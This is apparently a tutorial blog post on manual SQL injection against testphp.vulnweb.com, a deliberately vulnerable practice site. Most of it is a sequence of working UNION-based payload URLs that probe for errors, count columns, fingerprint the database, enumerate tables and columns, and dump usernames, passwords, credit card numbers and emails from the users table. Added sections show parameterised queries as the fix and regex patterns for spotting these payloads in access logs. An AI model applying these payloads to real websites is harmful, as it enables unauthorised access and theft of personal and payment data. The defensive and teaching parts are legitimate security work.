This article is based on our previous article, where you learned different techniques to perform SQL injection manually using dhakkan. Today we are again performing SQL injection manually on a live website, “vulnweb.com”, in order to save you the stress of installing and setting up dhakkan.
We are going to apply the same concepts and techniques as performed in Dhakkan on a different platform.
Let’s begin!
Open the targeted URL given below in the browser:
http://testphp.vulnweb.com/artist.php?artist=1
So here we are going to test SQL injection for “id=1”.
Now use the error-based technique by adding an apostrophe (') symbol at the end of the input, which will try to break the query.
http://testphp.vulnweb.com/artist.php?artist=1'
In the given screenshot you can see we have got an error message, which means the running site is vulnerable to SQL injection.
Now use the ORDER BY keyword to sort the records in ascending or descending order for id=1.
Similarly, repeat for order 2, 3 and so on, one by one.
From the screenshot you can see we have got an error at order by 4, which means it consists of only three records.
Let’s penetrate further using union-based injection to run a select statement on a different table.
http://testphp.vulnweb.com/artist.php?artist=1 union select 1,2,3
From the screenshot you can see it shows the result for only one table, not for the others.
Now try to pass a wrong input into the database through the URL by replacing artist=1 with artist=-1, as given below:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,2,3
Hence you can see it is now showing the result for the remaining two tables also.
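Why the steps so far behave as they do, and what stops them, shown as an added example that is not from the original article: the same inputs are run against a lookup that concatenates the artist value into the SQL text and against one that validates and binds it. It uses Python's sqlite3 instead of the site's PHP and MySQL, and the table layout, column names and row are constructed assumptions.

```python
import sqlite3

def make_db():
    # Constructed stand-in data: table "artist" with three hypothetical columns.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE artist (id INTEGER, name TEXT, bio TEXT)")
    db.execute("INSERT INTO artist VALUES (1, 'sample artist', 'sample bio')")
    return db

def lookup_vulnerable(db, artist):
    # The request value is pasted into the SQL text, so the database parses
    # everything after the number as SQL.
    return db.execute("SELECT * FROM artist WHERE id = " + artist).fetchall()

def lookup_hardened(db, artist):
    # Accept only ASCII digits, then bind the value as a parameter so it can
    # never be parsed as SQL.
    if not (artist.isascii() and artist.isdigit()):
        return []
    sql = "SELECT * FROM artist WHERE id = ?"
    return db.execute(sql, (int(artist),)).fetchall()

def outcome(lookup, artist):
    # What the page would end up showing: the rows, or a database error.
    try:
        return lookup(make_db(), artist)
    except sqlite3.Error:
        return "database error"

if __name__ == "__main__":
    inputs = ["1", "1'", "1 order by 4",
              "1 union select 1,2,3", "-1 union select 1,2,3"]
    for value in inputs:
        print(repr(value),
              "| vulnerable:", outcome(lookup_vulnerable, value),
              "| hardened:", outcome(lookup_hardened, value))
```

With artist=-1 no real row matches, so the only row left in the vulnerable result is the injected 1,2,3, which is why the page then displays those values.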
Use the next query to fetch the name of the database:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,database(),3
From the screenshot you can read the database name: acuart
The next query will extract the current username as well as the version of the database system:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,version(),current_user()
Here we have retrieved 5.1.73 0ubuntu0 10.04.1 as the version and acuart@localhost as the current user.
Through the next query we will try to fetch a table name inside the database:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1
From the screenshot you can see the name of the first table is carts.
Similarly, repeat the same query for another table with a slight change:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1
We got table 2: categ
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1
We got table 3: featured
Similarly, repeat the same query for tables 4, 5, 6 and 7, making slight changes in LIMIT.
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1
We got table 7: users
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1
Since we didn’t get anything when the limit is set to 8,1, there might be only 7 tables inside the database.
The concat function is used to concatenate two or more strings into a single string.
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
From the screenshot you can see that through the concat function we have successfully retrieved all the table names inside the database.
Table1: artist
Table2: Carts
Table3: Featured
Table4: Guestbook
Table5: Pictures
Table6: Product
Table7: users
Maybe we can get some important data from the users table, so let’s penetrate further. Again use the concat function for the table users to retrieve all its column names.
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(column_name),3 from users
Awesome!! We successfully retrieved all eight column names from inside the table users.
Then I chose only four columns, i.e. uname, pass, email and cc, for further enumeration.
Use the concat function to select uname from the table users by executing the following query through the URL:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(uname),3 from users
From the screenshot you can read uname: test
Use the concat function to select pass from the table users by executing the following query through the URL:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(pass),3 from users
From the screenshot you can read pass: test
Use the concat function to select cc (credit card) from the table users by executing the following query through the URL:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(cc),3 from users
From the screenshot you can read cc: 1234-5678-2300-9000
Use the concat function to select email from the table users by executing the following query through the URL:
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(email),3 from users
From the screenshot you can read email: jitendra@panalinks.com
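Every request in this walkthrough leaves a recognisable value in the web server's access log. The following added example (not part of the original article) decodes the query string of each logged request and tags the patterns used above; the rule names, the log lines and the IP addresses are constructed, and the common/combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures of the parameter values used in this walkthrough.
RULES = [
    ("quote-probe", re.compile(r"^-?\d+'$")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("db-fingerprint",
     re.compile(r"\b(?:database|version|current_user)\s*\(", re.I)),
    ("group-concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
]
# Client IP first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

# Constructed sample log lines (documentation IP ranges).
T = "[01/Jan/2024:10:00:00 +0000]"
LOG = [
    f'192.0.2.10 - - {T} "GET /artist.php?artist=1 HTTP/1.1" 200 512',
    f'198.51.100.7 - - {T} "GET /artist.php?artist=1%27 HTTP/1.1" 200 300',
    f'198.51.100.7 - - {T} "GET /artist.php?artist=1%20order%20by%204 HTTP/1.1" 200 300',
    f'198.51.100.7 - - {T} "GET /artist.php?artist=-1+union+select+1,database(),3 HTTP/1.1" 200 400',
    f'198.51.100.7 - - {T} "GET /artist.php?artist=-1%20union%20select%201,'
    'group_concat(table_name),3%20from%20information_schema.tables HTTP/1.1" 200 700',
]

def classify(line):
    """Return (client_ip, sorted rule names hit) or None if unparsable."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target = m.groups()
    hits = set()
    # parse_qsl percent-decodes values and turns '+' into spaces.
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(name for name, rx in RULES if rx.search(value))
    return ip, sorted(hits)

def scan(lines):
    """Map each client IP to the rule names its requests triggered."""
    found = {}
    for parsed in filter(None, map(classify, lines)):
        if parsed[1]:
            found.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(names) for ip, names in found.items()}

if __name__ == "__main__":
    print(scan(LOG))
```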
Enjoy hacking!!